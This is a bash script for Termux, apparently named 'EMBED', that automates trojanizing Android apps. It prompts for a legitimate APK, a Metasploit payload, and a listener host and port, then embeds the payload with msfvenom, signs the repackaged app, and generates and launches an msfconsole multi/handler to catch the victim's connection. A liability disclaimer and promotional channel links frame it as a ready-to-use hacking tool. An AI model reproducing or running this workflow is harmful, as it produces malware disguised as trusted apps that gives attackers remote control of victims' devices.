#!/data/data/com.termux/files/usr/bin/bash
set -euo pipefail
IFS=$'\n\t'
trap ctrl_c 2
function ctrl_c () {
                echo "
		"
                printf "$Y [!]$R Going me on https://t.me/Ivam3by_Cinderella$W
                \n"
        }

# VAR
	R='\033[1;31m'
        G='\033[1;32m'
        Y='\033[1;33m'
        B='\033[1;34m'
	M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'
	TMP_DIR=$HOME/java
	unsign=$(find $TMP_DIR/unsign -name "output.apk")

function Banner {
	echo $(clear)
	printf "$Y"
	echo "   ._____ __  __ ____  _____ ____"
	echo "   | ____|  \/  | __ )| ____|  _ \ "
	echo "   |  _| |      |  _ \|  _| | | | |"
	echo "   | |___| |\/| | |_) | |___| |_| |"
	echo "   |_____|_|  |_|____/|_____|____/ v.1.5"
	printf "$W
	\n"
}

function Chao_chao {
	echo $(clear)
        echo "
        "
        printf "$C"
        echo "#-----THANKS TO MY MASTER CINDERELLA-----#"
        echo "#                                        #"
        echo "#             People don't die           #"
        echo "#    If they still live in the hearts    #"
        echo "#           of their loved ones          #"
	echo "#       We love her ... We miss her      #"
        echo "#                                        #"
        echo "#-------------------RIP------------------#"
	printf "$W"
        echo "
        "
}

function SET {
	Banner
printf "$C [IbyC]$M Let's to configure it$W
	\n"
	sleep 2

printf "$C [Set]$G LEGITIM .APK$W"
	while read -p " >> " APK && [ -z $APK ]; do
		printf "\n $R
		[W] O-ops!! Please set some legitim .Apk
		$W \n"
	done
			if [ ! -e $APK ]; then
				printf "$R [W] O-ops!! the .Apk doesn't exist
				$W \n"
				sleep 2
				SET
			fi

printf "$C [Set]$G PAYLOAD$W"
	while read -p " >> " PAYLOAD && [ -z $PAYLOAD ]; do
		printf "\n $R
		[W] O-ops!! Please set a payload
		$W \n"
	done

printf "$C [Set]$G LOCAL HOST$W"
        while read -p " >> " LHOST && [ -z $LHOST ]; do
                printf "\n $R
                [W] O-ops!! Please set a host
                $W \n"
	done

printf "$C [Set]$G LOCAL PORT$W"
        while read -p " >> " LPORT && [ -z $LPORT ]; do
                printf "\n $R
                [W] O-ops!! Please set a local port
                $W \n"
        done

printf "$C [Set]$G NAMED YOUR .APK$W"
	while read -p " >> " MYAPK && [ -z $MYAPK ]; do
		printf "\n $R
		[W] O-ops!! Please set a name
		$W \n"
	done
sleep 1
	Check
}
function Check {
	Banner
	printf "$C [IbyC]$M Is the setting correct ?
	"
	sleep 1
printf "$Y [!]$G L-APK   =$W $APK \n"
printf "$Y	 [!]$G PAYLOAD =$W $PAYLOAD \n"
printf "$Y	 [!]$G LHOST   =$W $LHOST \n"
printf "$Y	 [!]$G LPORT   =$W $LPORT \n"
printf "$Y	 [!]$G YourApk =$W $MYAPK \n"
echo 
	while read -p "(y|Y/n|N) >> " yesorno && [ -z $yesorno ]; do
		printf "\n $R
		[W] O-ops!! Please answer the question
		$W \n"
	done
		if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
			Payload
		else
			SET
		fi
}
function Payload {
	Banner
	printf "$C [IbyC]$M Creating payload . . .$W
	"
	msfvenom -x $APK -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT
	sleep 2
        sign
}
function sign {
	Banner
	printf "$C [IbyC]$M Choose a type of signature
	\n"
	printf "$C [1]$G Jarsigner \n"
	printf "$C [2]$G Apksigner$W
	\n"
	while read -p "(1/2) >> " SIGN && [ -z $SIGN ]; do
		printf "$R
		[W] Please, choose an option
		\n $W"
	done
	
	if [ $SIGN -eq '1' ]; then
		echo
		printf "$C [IbyC]$M Signing the .Apk with signapk tool. . .$W \n"
		cd $TMP_DIR/openjdk
                sleep 3
		signapk publickey.x509.pem publickey.pk8 $TMP_DIR/unsign/output.apk $TMP_DIR/finished/$MYAPK
                rm $TMP_DIR/unsign/output.apk
		cd $HOME
		echo
		printf "$G \n \t DONE!!
		$W"
		sleep 1
		Ending
	elif [ $SIGN -eq '2' ]; then
		printf "$C [IbyC]$M Signing the .Apk with apksigner tool. . .$W \n"
		cd $TMP_DIR/unsign
		sleep 3
		apksigner -p Ivam3byCinderella keystore output.apk $TMP_DIR/finished/$MYAPK
		rm output.apk
		cd $HOME
		printf "$G \n \t DONE!!
		$W"
		sleep 1
		Ending
	else
			sign
	fi
}
function Set_Handler {
	Banner
	printf "$C \n [Set]$G LOCAL HOST$W"
		while read -p " >> " LHOST && [ -z $LHOST ]; do
			printf "\n $R
			[W] O-ops!! Please set a host
			$W \n"
		done
	printf "$C [Set]$G LOCAL PORT$W"
		while read -p " >> " LPORT && [ -z $LPORT ]; do
			printf "\n $R
			[W] O-ops!! Please set a local port
			$W \n"
		done
	Banner
	printf "$C [IbyC]$M Is the setting correct?
	"
        sleep 1
        printf "$Y [!]$G PAYLOAD =$W $PAYLOAD \n"
	printf "$Y         [!]$G LHOST   =$W $LHOST \n"
	printf "$Y         [!]$G LPORT   =$W $LPORT \n"
	echo
		while read -p "(y|Y/n|N) >> " yesorno && [ -z $yesorno ]; do
			printf "\n $R
			[W] O-ops!! Please answer the question
			$W \n"
		done
			if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
				Msfconsole
			else
				Set_Handler
			fi
}
function Msfconsole {
	Chao_chao
	echo
	printf "$C [IbyC]$M Starting msfconsole . . .$W"
	echo
	touch $TMP_DIR/handler/$MYAPK.rc
	echo "use multi/handler" >> $TMP_DIR/handler/$MYAPK.rc
	echo "set PAYLOAD $PAYLOAD" >> $TMP_DIR/handler/$MYAPK.rc
	echo "set LHOST $LHOST" >> $TMP_DIR/handler/$MYAPK.rc
	echo "set LPORT $LPORT" >> $TMP_DIR/handler/$MYAPK.rc
	echo "run" >> $TMP_DIR/handler/$MYAPK.rc
	chmod 777 $TMP_DIR/handler/$MYAPK.rc
	echo "
	"
	msfconsole -q -r $TMP_DIR/handler/$MYAPK.rc
}
function Ending {
	printf "$C \n
[IbyC]$M Do you wanna start msfconsole handler?$W
	\n"
        while read -p "(y|Y/n|N) >> " yesorno && [ -z $yesorno ]; do
                printf "\n $R
                [W] Please, choose an option
                $W \n"
        done
                if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
                        Banner
                        printf "$C [IbyC]$M Do you wanna use the previous configuration ?$W
                        \n"
                        while read -p "(y|Y/n|N) >> " yesorno && [ -z $yesorno ]; do
                                printf "$R
                                [W] Please, choose an option
                                $W \n"
                        done
                        if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
                                Msfconsole
                        else
                                Set_Handler
                        fi
                else
                        Chao_chao
                        printf "$C [IbyC]$G Thanks to use my EMBED tool$W
                        \n"
                        printf "$C [IbyC]$G Have a nice hacking day!!
                $W \n"
        fi
}

echo $(clear)
        printf "$C"
        echo "         -{ IbyC > EMBED } "
        echo "   -{ SO > Android - Only for Termux } "
        echo "              -{ Coded by } "
        printf "$G"
printf "$G"
        echo "      =============================="
        echo "      .___.                 ______,"
        echo "      |   |__ ______   ___  \_____ \ "
        echo "      |   \ \/ /\__ \ /   \   _(__ <,"
        echo "      |   |\   / __ \| Y Y \ /      \ "
        echo "      |___| \_/ (____|__|_| /______ /"
        echo "                     \/    \/      \/ "
        echo "      ====== By ___ Cinderella ======"
        echo
printf "$C"
        echo "          [---] Join me on [---]"
        echo "[-] www.youtube.com/c/ivam3bycinderella [-]"
        echo "            [-] t.me/ivam3 [-]"
        echo "
        "
printf "$R"
        echo "          [---] DISCLAIMER [---]"
printf "$W"
        echo " This script will embed a Metasploit payload"
        echo "         in an legitim .Apk file
        "
        echo " If the law is violated with it's use,"
        echo "  This would be the responsibility of "
        echo "        the user who handled it
        "
printf "$R       [-] Use At Your Own Risk [-]"
        echo
        echo
        printf "        $C Press$G enter$C to continue$W"
        read enter
	SET
        echo "

        "
#					@IbyC.
